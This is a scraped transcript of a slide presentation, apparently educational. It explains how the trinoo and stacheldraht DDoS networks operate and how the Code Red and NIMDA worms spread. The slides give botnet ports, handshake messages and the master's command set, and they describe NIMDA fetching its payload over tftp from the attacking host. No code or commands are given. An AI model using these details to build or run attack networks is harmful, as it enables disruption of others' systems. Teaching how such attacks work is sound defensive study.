Presentation is loading. Please wait.

Presentation is loading. Please wait.

A Distributed DoS in Action

Published byClemens Schneider Modified over 6 years ago

Similar presentations

Presentation on theme: "A Distributed DoS in Action"— Presentation transcript:

1 A Distributed DoS in Action
Client Hacker Broadcast Host Master Master Control Programs Agents Registration Phase Verify Registration PONG *Hello* png The Internet When the Master Control Programs are loaded and run, they just listen at TCP port for any messages coming from the Client Hacker, and they listen at UDP port for any messages coming from the hundreds of Broadcast Agents. Any messages coming from the Client Hacker will require a password, as well, to be accepted by the Master Control Program. When the Broadcast Agents are loaded, they contain a small encrypted list of IP addresses for the locations of all the Master Control Programs. When the Broadcast Agent is first run, it sends a short UDP packet containing the word “*HELLO*” to these IP addresses (port 31335, of course) so they will, in effect, register with the Master Control Program that they are ready. The Master Control Programs will record the IP address of the sender (the location of the Broadcast Agent). The Broadcast Agents then just listen at UDP port for any future commands coming from the Master. Prior to initiating the attack, the Client Hacker can, optionally, send a command to the Master Control Programs to verify that the Broadcast Agents are still ready (and that they have not been discovered or the host taken offline). The Master Control Programs sends a UDP packet containing the word “png” to all the Hundreds of Broadcast Agent IP addresses (at port 27444). Agents that are still active will respond back with the word “PONG” (to port on the Master).

2 The Attack Phase Client Hacker The Internet Agents Target Attack
Broadcast Host Agents Attack Target Attack Target The Internet When the Hacker is ready to begin the attack, he sends the command, along with the password and list of IP addresses to target, to the Master Control Programs (to TCP port 27665). The Master Control Programs then send the command and IP address list to hundreds of Broadcast Agents they have registered all over the Internet (to UDP port ). The hundreds of Broadcast Agents then begin their attack and flood random ports of the target host(s) with simple UDP packets. Additionally, in the case of stacheldraht, the packets sent have a spoofed source IP address. This way the attacks looks like they are coming from a complete different source, which now involves yet another party in the attack. Trinoo comes with 6 different commands that the Master will accept from the Client Hacker. They include: Setting a timer to begin the attack at a future time Begin DoS attack at one IP target Begin DoS attack at multiple IP targets Kill all Broadcast Agents registered Verify that registered Agents are still ready (the “png”-”pong”) Set size of UDP packet to use in the flood attack UDP Flood Attack UDP Flood Attack COLLATERAL DAMAGE

3 How CODE RED Works First infected system
Cod Red exploits the vulnerable index service Internet Service API (ISAPI), a remote buffer overflow vulnerability that affects all versions of Microsoft IIS. First infected systems attempts to connect to other systems via port 80 (web)

4 Scans to find new victims
How CODE RED Works First infected system Scans to find new victims 100 system probes

5 Scans to find new victims
How CODE RED Works First infected system Scans to find new victims

6 - Each new victim starts scanning process over again
- From the 20th to the EOM, attempts to launch a DOS against ( by sending large junk packets - Each new victim starts scanning process over again - 20th to EOM, primary target is

7 How NIMDA Works First infected system
NIMDA attempts to infect using the following methods: IIS Extended Unicode Directory Traversal Vulnerability IIS Escaped Character Decoding Command Execution Vulnerability Previous backdoors left by Code Red II and Sadmind infections First infected systems attempts to connect to other systems via port 80 (web)

8 tftp Admin.dll from attacking system (contains NIMDA payload)
How NIMDA Works First infected system tftp Admin.dll from attacking system (contains NIMDA payload) - Once the victim has been infected, it uses the trivial file transfer protocol (similar to ftp) to retrieve “Admin.dll” from the attacking system. Admin.dll contains the NIMDA code. Attacking system

9 vulnerable IIS web servers
How NIMDA Works First infected system Sends infected attachment NIMDA propagates via open file shares Infected system scans network for vulnerable IIS web servers Once infected with NIMDA the victim system will: Scan the network for vulnerable IIS web servers harvests addresses from the Windows address book and sends infected “readme.exe” attachment attaches a copy of NIMDA, named “README.EML” to all web related files (.html, .htm, etc) attempt to copy NIMDA to all open file shares NIMDA attaches to web pages on infected server

10 How NIMDA Works - NIMDA prefers to target its neighbors
NIMDA targets systems in its own IP space; it will only attack a completely random target IP with a 25% probability NIMDA chooses targets having the same first octet (only) with 25% probability NIMDA chooses targets having the same first two octets with 50% probability - NIMDA prefers to target its neighbors - Very rapid propagation

Download ppt "A Distributed DoS in Action"

Similar presentations

Umut Girit 200535027.  One of the core members of the Internet Protocol Suite, the set of network protocols used for the Internet. With UDP, computer.

Umut Girit  One of the core members of the Internet Protocol Suite, the set of network protocols used for the Internet. With UDP, computer.
CISCO NETWORKING ACADEMY PROGRAM (CNAP)

CISCO NETWORKING ACADEMY PROGRAM (CNAP)
Exploits Dalia Solomon. Categories Trojan Horse Attacks Trojan Horse Attacks Smurf Attack Smurf Attack Port Scan Port Scan Buffer Overflow Buffer Overflow.

Exploits Dalia Solomon. Categories Trojan Horse Attacks Trojan Horse Attacks Smurf Attack Smurf Attack Port Scan Port Scan Buffer Overflow Buffer Overflow.
Security (Continued) V.T. Raja, Ph.D., Oregon State University.

Security (Continued) V.T. Raja, Ph.D., Oregon State University.
Computer Security Fundamentals by Chuck Easttom Chapter 4 Denial of Service Attacks.

Computer Security Fundamentals by Chuck Easttom Chapter 4 Denial of Service Attacks.
Hacking Presented By :KUMAR ANAND SINGH 04-243,ETC/2008.

Hacking Presented By :KUMAR ANAND SINGH ,ETC/2008.
Introduction to Security Computer Networks Computer Networks Term B10.

Introduction to Security Computer Networks Computer Networks Term B10.
How Clients and Servers Work Together. Objectives Web Server Protocols Examine how e-mail server and client software work Use FTP to transfer files Initiate.

How Clients and Servers Work Together. Objectives Web Server Protocols Examine how server and client software work Use FTP to transfer files Initiate.
Multi-Route Anomaly detection using Principal Component Analysis Adnan Iqbal Superviser Dr. Waqar Mahmood 21-06-05.

Multi-Route Anomaly detection using Principal Component Analysis Adnan Iqbal Superviser Dr. Waqar Mahmood
Intruder Trends Tom Longstaff CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA 15213-3890 Sponsored by.

Intruder Trends Tom Longstaff CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA Sponsored by.
1 © 2003, Cisco Systems, Inc. All rights reserved. CCNA 1 v3.0 Module 11 TCP/IP Transport and Application Layers.

1 © 2003, Cisco Systems, Inc. All rights reserved. CCNA 1 v3.0 Module 11 TCP/IP Transport and Application Layers.
UNCLASSIFIED Secure Indirect Routing and An Autonomous Enterprise Intrusion Defense System Applied to Mobile ad hoc Networks J. Leland Langston, Raytheon.

UNCLASSIFIED Secure Indirect Routing and An Autonomous Enterprise Intrusion Defense System Applied to Mobile ad hoc Networks J. Leland Langston, Raytheon.
File Transfer: FTP and TFTP

File Transfer: FTP and TFTP
1 CCNA 2 v3.1 Module 10. 2 Intermediate TCP/IP CCNA 2 Module 10.

1 CCNA 2 v3.1 Module Intermediate TCP/IP CCNA 2 Module 10.
WXES2106 Network Technology Semester 1 2004/2005 Chapter 8 Intermediate TCP CCNA2: Module 10.

WXES2106 Network Technology Semester /2005 Chapter 8 Intermediate TCP CCNA2: Module 10.
100% Security “ The only system which is truly secure is one which is switched off and unplugged, locked in a titanium lined safe, buried in a concrete.

100% Security “ The only system which is truly secure is one which is switched off and unplugged, locked in a titanium lined safe, buried in a concrete.
DDos Distributed Denial of Service Attacks by Mark Schuchter.

DDos Distributed Denial of Service Attacks by Mark Schuchter.
Internet Relay Chat Security Issues By Kelvin Lau and Ming Li.

Internet Relay Chat Security Issues By Kelvin Lau and Ming Li.
File Transfer Protocol (FTP)

File Transfer Protocol (FTP)
The Transport Layer.

The Transport Layer.

Similar presentations

Ads by Google